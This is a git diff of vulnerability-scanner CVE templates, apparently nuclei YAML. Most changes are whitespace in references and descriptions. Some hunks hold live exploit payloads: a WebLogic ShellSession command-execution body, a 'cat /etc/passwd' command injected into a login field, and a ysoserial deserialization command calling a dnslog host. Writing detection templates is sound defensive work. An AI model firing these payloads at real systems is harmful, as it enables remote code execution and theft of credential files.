diff --git a/cves/2020/CVE-2020-11978.yaml b/cves/2020/CVE-2020-11978.yaml
index fac9efaabe..e39d531569 100644
--- a/cves/2020/CVE-2020-11978.yaml
+++ b/cves/2020/CVE-2020-11978.yaml
@@ -5,9 +5,9 @@ info:
severity: high
description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.
reference:
- - https://github.com/pberba/CVE-2020-11978
- - https://nvd.nist.gov/vuln/detail/CVE-2020-11978
- - https://twitter.com/wugeej/status/1400336603604668418
+ - https://github.com/pberba/CVE-2020-11978
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-11978
+ - https://twitter.com/wugeej/status/1400336603604668418
tags: cve,cve2020,apache,airflow,rce
requests:
diff --git a/cves/2020/CVE-2020-13167.yaml b/cves/2020/CVE-2020-13167.yaml
index e6ba5ee430..c21bdb58bb 100644
--- a/cves/2020/CVE-2020-13167.yaml
+++ b/cves/2020/CVE-2020-13167.yaml
@@ -10,16 +10,16 @@ info:
- https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
- https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
- # This template exploits a Python code injection in the Netsweeper
- # WebAdmin component's unixlogin.php script, for versions 6.4.4 and
- # prior, to execute code as the root user.
+# This template exploits a Python code injection in the Netsweeper
+# WebAdmin component's unixlogin.php script, for versions 6.4.4 and
+# prior, to execute code as the root user.
- # Authentication is bypassed by sending a random whitelisted Referer
- # header in each request.
+# Authentication is bypassed by sending a random whitelisted Referer
+# header in each request.
- # Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
- # Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
- # been confirmed exploitable.
+# Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
+# Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
+# been confirmed exploitable.
requests:
- method: GET
diff --git a/cves/2020/CVE-2020-13700.yaml b/cves/2020/CVE-2020-13700.yaml
index 645363a779..844a1401f5 100644
--- a/cves/2020/CVE-2020-13700.yaml
+++ b/cves/2020/CVE-2020-13700.yaml
@@ -6,9 +6,9 @@ info:
severity: high
reference: https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5
description: |
- An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress.
- It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a
- wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values.
+ An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress.
+ It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a
+ wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values.
tags: cve,cve2020,wordpress
requests:
diff --git a/cves/2020/CVE-2020-13937.yaml b/cves/2020/CVE-2020-13937.yaml
index 46ac04bffe..be27c3f3a9 100644
--- a/cves/2020/CVE-2020-13937.yaml
+++ b/cves/2020/CVE-2020-13937.yaml
@@ -5,12 +5,12 @@ info:
author: pikpikcu
severity: medium
description: |
- Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0,
- 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4,
- 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1,
- 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
- Kylin's configuration information without any authentication,
- so it is dangerous because some confidential information entries will be disclosed to everyone.
+ Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0,
+ 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4,
+ 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1,
+ 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
+ Kylin's configuration information without any authentication,
+ so it is dangerous because some confidential information entries will be disclosed to everyone.
reference:
- https://kylin.apache.org/docs/release_notes.html
- https://s.tencent.com/research/bsafe/1156.html
diff --git a/cves/2020/CVE-2020-14883.yaml b/cves/2020/CVE-2020-14883.yaml
index dbb81a9dd2..84fa26ca9a 100644
--- a/cves/2020/CVE-2020-14883.yaml
+++ b/cves/2020/CVE-2020-14883.yaml
@@ -17,7 +17,7 @@ requests:
Test-Header: cat /etc/passwd
body: |
- test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("Test-Header");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')
+ test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("Test-Header");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')
matchers-condition: and
matchers:
diff --git a/cves/2020/CVE-2020-15148.yaml b/cves/2020/CVE-2020-15148.yaml
index 67847810d6..247fac361d 100644
--- a/cves/2020/CVE-2020-15148.yaml
+++ b/cves/2020/CVE-2020-15148.yaml
@@ -5,8 +5,8 @@ info:
author: pikpikcu
severity: high
reference:
- - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943
- - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md
+ - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943
+ - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md
tags: cve,cve2020,rce,yii
requests:
diff --git a/cves/2020/CVE-2020-15227.yaml b/cves/2020/CVE-2020-15227.yaml
index 4b1e65c8a7..474fa19f0a 100644
--- a/cves/2020/CVE-2020-15227.yaml
+++ b/cves/2020/CVE-2020-15227.yaml
@@ -6,10 +6,10 @@ info:
severity: high
description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework.
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2020-15227
- - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
- - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E#
- - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-15227
+ - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
+ - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E#
+ - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md
tags: cve,cve2020,nette,rce
requests:
diff --git a/cves/2020/CVE-2020-21224.yaml b/cves/2020/CVE-2020-21224.yaml
index 1e84564e2d..e85004b3b3 100644
--- a/cves/2020/CVE-2020-21224.yaml
+++ b/cves/2020/CVE-2020-21224.yaml
@@ -17,7 +17,7 @@ requests:
Referer: "{{Hostname}}/module/login/login.html"
body: |
- op=login&username=;`cat /etc/passwd`&password=
+ op=login&username=;`cat /etc/passwd`&password=
matchers-condition: and
matchers:
diff --git a/cves/2020/CVE-2020-27866.yaml b/cves/2020/CVE-2020-27866.yaml
index 5ef1db5c75..9222bdaf5d 100644
--- a/cves/2020/CVE-2020-27866.yaml
+++ b/cves/2020/CVE-2020-27866.yaml
@@ -7,9 +7,9 @@ info:
description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability.
tags: cve,cve2020,netgear,auth-bypass
reference:
- - https://wzt.ac.cn/2021/01/13/AC2400_vuln/
- - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866
+ - https://wzt.ac.cn/2021/01/13/AC2400_vuln/
+ - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866
requests:
- raw:
diff --git a/cves/2020/CVE-2020-27986.yaml b/cves/2020/CVE-2020-27986.yaml
index fa8541d74b..dcb73a8bf5 100644
--- a/cves/2020/CVE-2020-27986.yaml
+++ b/cves/2020/CVE-2020-27986.yaml
@@ -5,9 +5,9 @@ info:
author: pikpikcu
severity: medium
description: |
- SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
- SVN, and GitLab credentials via the api/settings/values URI.
- NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
+ SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
+ SVN, and GitLab credentials via the api/settings/values URI.
+ NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
reference: https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/
tags: cve,cve2020,sonarqube
diff --git a/cves/2020/CVE-2020-36112.yaml b/cves/2020/CVE-2020-36112.yaml
index 522d6d82c3..f5a620db25 100644
--- a/cves/2020/CVE-2020-36112.yaml
+++ b/cves/2020/CVE-2020-36112.yaml
@@ -5,8 +5,8 @@ info:
author: geeknik
description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database.
reference:
- - https://www.exploit-db.com/exploits/49314
- - https://www.tenable.com/cve/CVE-2020-36112
+ - https://www.exploit-db.com/exploits/49314
+ - https://www.tenable.com/cve/CVE-2020-36112
severity: critical
tags: cve,cve2020,sqli,cse
diff --git a/cves/2020/CVE-2020-36289.yaml b/cves/2020/CVE-2020-36289.yaml
index 22359eda5d..9b1cb65ed5 100644
--- a/cves/2020/CVE-2020-36289.yaml
+++ b/cves/2020/CVE-2020-36289.yaml
@@ -7,8 +7,8 @@ info:
description: Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the QueryComponentRendererValue!Default.jspa endpoint. The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.
tags: cve,cve2020,jira,atlassian
reference:
- - https://twitter.com/ptswarm/status/1402644004781633540
- - https://nvd.nist.gov/vuln/detail/CVE-2020-36289
+ - https://twitter.com/ptswarm/status/1402644004781633540
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-36289
requests:
- method: GET
diff --git a/cves/2020/CVE-2020-5307.yaml b/cves/2020/CVE-2020-5307.yaml
index 175c159ba9..81f8a02ae5 100644
--- a/cves/2020/CVE-2020-5307.yaml
+++ b/cves/2020/CVE-2020-5307.yaml
@@ -5,7 +5,7 @@ info:
author: gy741
description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.
reference:
- - https://cinzinga.com/CVE-2020-5307-5308/
+ - https://cinzinga.com/CVE-2020-5307-5308/
severity: critical
tags: cve,cve2020,sqli
diff --git a/cves/2020/CVE-2020-7209.yaml b/cves/2020/CVE-2020-7209.yaml
index 2d8af1dd8c..a4df4fd3d9 100644
--- a/cves/2020/CVE-2020-7209.yaml
+++ b/cves/2020/CVE-2020-7209.yaml
@@ -13,8 +13,8 @@ info:
- https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
- https://www.hpe.com/us/en/home.html # vendor homepage
- # This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
- # The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
+# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
+# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
requests:
- method: GET
diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml
index 0a0e1ce779..4db2ab02e8 100644
--- a/cves/2020/CVE-2020-7961.yaml
+++ b/cves/2020/CVE-2020-7961.yaml
@@ -7,8 +7,8 @@ info:
tags: cve,cve2020,rce,liferay
description: Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS).
reference:
- - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html
- - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271
+ - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html
+ - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271
requests:
- payloads:
diff --git a/cves/2020/CVE-2020-9490.yaml b/cves/2020/CVE-2020-9490.yaml
index 29298339ca..cd341cf256 100644
--- a/cves/2020/CVE-2020-9490.yaml
+++ b/cves/2020/CVE-2020-9490.yaml
@@ -7,10 +7,10 @@ info:
author: philippedelteil
tags: cve,cve2020,apache,dos
reference:
- - https://httpd.apache.org/security/vulnerabilities_24.html
- - https://bugs.chromium.org/p/project-zero/issues/detail?id=2030
- - https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=443369
- - https://nvd.nist.gov/vuln/detail/CVE-2020-9490
+ - https://httpd.apache.org/security/vulnerabilities_24.html
+ - https://bugs.chromium.org/p/project-zero/issues/detail?id=2030
+ - https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=443369
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-9490
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-20090.yaml b/cves/2021/CVE-2021-20090.yaml
index 9f70517315..9c9c57c372 100644
--- a/cves/2021/CVE-2021-20090.yaml
+++ b/cves/2021/CVE-2021-20090.yaml
@@ -7,9 +7,9 @@ info:
description: |
A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2021-20090
- - https://www.tenable.com/security/research/tra-2021-13
- - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-20090
+ - https://www.tenable.com/security/research/tra-2021-13
+ - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,lfi,buffalo,firmware,iot
requests:
diff --git a/cves/2021/CVE-2021-20091.yaml b/cves/2021/CVE-2021-20091.yaml
index 55bd86f160..6ac0d4f526 100644
--- a/cves/2021/CVE-2021-20091.yaml
+++ b/cves/2021/CVE-2021-20091.yaml
@@ -7,9 +7,9 @@ info:
description: |
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2021-20091
- - https://www.tenable.com/security/research/tra-2021-13
- - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-20091
+ - https://www.tenable.com/security/research/tra-2021-13
+ - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,buffalo,firmware,iot
requests:
diff --git a/cves/2021/CVE-2021-20092.yaml b/cves/2021/CVE-2021-20092.yaml
index 306d94127d..6b175dab6d 100644
--- a/cves/2021/CVE-2021-20092.yaml
+++ b/cves/2021/CVE-2021-20092.yaml
@@ -7,9 +7,9 @@ info:
description: |
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2021-20091
- - https://www.tenable.com/security/research/tra-2021-13
- - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-20091
+ - https://www.tenable.com/security/research/tra-2021-13
+ - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,buffalo,firmware,iot
requests:
diff --git a/cves/2021/CVE-2021-21307.yaml b/cves/2021/CVE-2021-21307.yaml
index 216727adc8..cdd020bddc 100644
--- a/cves/2021/CVE-2021-21307.yaml
+++ b/cves/2021/CVE-2021-21307.yaml
@@ -6,9 +6,9 @@ info:
severity: critical
description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development. In Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 there is an unauthenticated remote code exploit. This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, one can block access to the Lucee Administrator.
reference:
- - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r
- - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
- - https://nvd.nist.gov/vuln/detail/CVE-2021-21307
+ - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r
+ - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-21307
tags: cve,cve2021,rce,lucee,adobe
requests:
diff --git a/cves/2021/CVE-2021-22214.yaml b/cves/2021/CVE-2021-22214.yaml
index ffaac3c2bc..51523e26ab 100644
--- a/cves/2021/CVE-2021-22214.yaml
+++ b/cves/2021/CVE-2021-22214.yaml
@@ -6,9 +6,9 @@ info:
severity: medium
description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2021-22214
- - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
- - https://docs.gitlab.com/ee/api/lint.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-22214
+ - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
+ - https://docs.gitlab.com/ee/api/lint.html
tags: cve,cve2021,gitlab,ssrf,oob
requests:
diff --git a/cves/2021/CVE-2021-24176.yaml b/cves/2021/CVE-2021-24176.yaml
index 8b18bc6ce9..54bede3572 100644
--- a/cves/2021/CVE-2021-24176.yaml
+++ b/cves/2021/CVE-2021-24176.yaml
@@ -6,8 +6,8 @@ info:
severity: medium
description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard.
reference:
- - https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585
- - https://wordpress.org/plugins/jh-404-logger/
+ - https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585
+ - https://wordpress.org/plugins/jh-404-logger/
tags: cve,cve2021,wordpress,wp-plugin,xss
requests:
diff --git a/cves/2021/CVE-2021-24237.yaml b/cves/2021/CVE-2021-24237.yaml
index 6a8ba89710..365eb7c2d9 100644
--- a/cves/2021/CVE-2021-24237.yaml
+++ b/cves/2021/CVE-2021-24237.yaml
@@ -7,8 +7,8 @@ info:
severity: medium
tags: cve,cve2021,realteo,xss,wordpress
reference:
- - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e
- - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt
+ - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e
+ - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-24285.yaml b/cves/2021/CVE-2021-24285.yaml
index 9d7f344e7d..8f67d63102 100644
--- a/cves/2021/CVE-2021-24285.yaml
+++ b/cves/2021/CVE-2021-24285.yaml
@@ -7,9 +7,9 @@ info:
description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitise, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue.
tags: cve,cve2021,wordpress,wp-plugin,sqli
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2021-24285
- - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
- - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24285
+ - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
+ - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162
requests:
- raw:
diff --git a/cves/2021/CVE-2021-24316.yaml b/cves/2021/CVE-2021-24316.yaml
index 036761fd15..f4b9b78af4 100644
--- a/cves/2021/CVE-2021-24316.yaml
+++ b/cves/2021/CVE-2021-24316.yaml
@@ -7,8 +7,8 @@ info:
severity: medium
tags: cve,cve2021,mediumish,xss,wordpress
reference:
- - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e
- - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt
+ - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e
+ - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-24495.yaml b/cves/2021/CVE-2021-24495.yaml
index 4fae911bf5..1c13d872ec 100644
--- a/cves/2021/CVE-2021-24495.yaml
+++ b/cves/2021/CVE-2021-24495.yaml
@@ -6,8 +6,8 @@ info:
severity: medium
tags: cve,cve2021,wp-plugin,wordpress,xss
reference:
- - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/
- - https://wordpress.org/plugins/marmoset-viewer/#developers
+ - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/
+ - https://wordpress.org/plugins/marmoset-viewer/#developers
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-25646.yaml b/cves/2021/CVE-2021-25646.yaml
index a1128591fe..23c3e6d3dc 100644
--- a/cves/2021/CVE-2021-25646.yaml
+++ b/cves/2021/CVE-2021-25646.yaml
@@ -6,8 +6,8 @@ info:
severity: critical
reference: https://paper.seebug.org/1476/
description: |
- Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data.
- Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
+ Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data.
+ Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
tags: cve,cve2021,apache,rce
requests:
diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml
index 95539c89b6..3044206eb1 100644
--- a/cves/2021/CVE-2021-26295.yaml
+++ b/cves/2021/CVE-2021-26295.yaml
@@ -10,9 +10,9 @@ info:
- https://lists.apache.org/thread.html/r3c1802eaf34aa78a61b4e8e044c214bc94accbd28a11f3a276586a31%40%3Cuser.ofbiz.apache.org%3E
- https://lists.apache.org/thread.html/r6e4579c4ebf7efeb462962e359501c6ca4045687f12212551df2d607@%3Cnotifications.ofbiz.apache.org%3E
- # Note:- This is detection template, To perform deserializes do as below
- # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot
- # `cat mad.ot | hex` and replace in along with the url in std-String value
+# Note:- This is detection template, To perform deserializes do as below
+# java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot
+# `cat mad.ot | hex` and replace in along with the url in std-String value
requests:
- raw:
diff --git a/cves/2021/CVE-2021-26812.yaml b/cves/2021/CVE-2021-26812.yaml
index ae38d892b3..032841467b 100644
--- a/cves/2021/CVE-2021-26812.yaml
+++ b/cves/2021/CVE-2021-26812.yaml
@@ -7,8 +7,8 @@ info:
severity: medium
tags: cve,cve2021,moodle,jitsi,xss
reference:
- - https://github.com/udima-university/moodle-mod_jitsi/issues/67
- - https://nvd.nist.gov/vuln/detail/CVE-2021-26812
+ - https://github.com/udima-university/moodle-mod_jitsi/issues/67
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-26812
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml
index a630ca1cab..eeaa087bd7 100644
--- a/cves/2021/CVE-2021-26855.yaml
+++ b/cves/2021/CVE-2021-26855.yaml
@@ -5,13 +5,13 @@ info:
author: madrobot
severity: critical
description: |
- Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
+ Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
tags: cve,cve2021,ssrf,rce,exchange,oob
reference:
- - https://proxylogon.com/#timeline
- - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
- - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
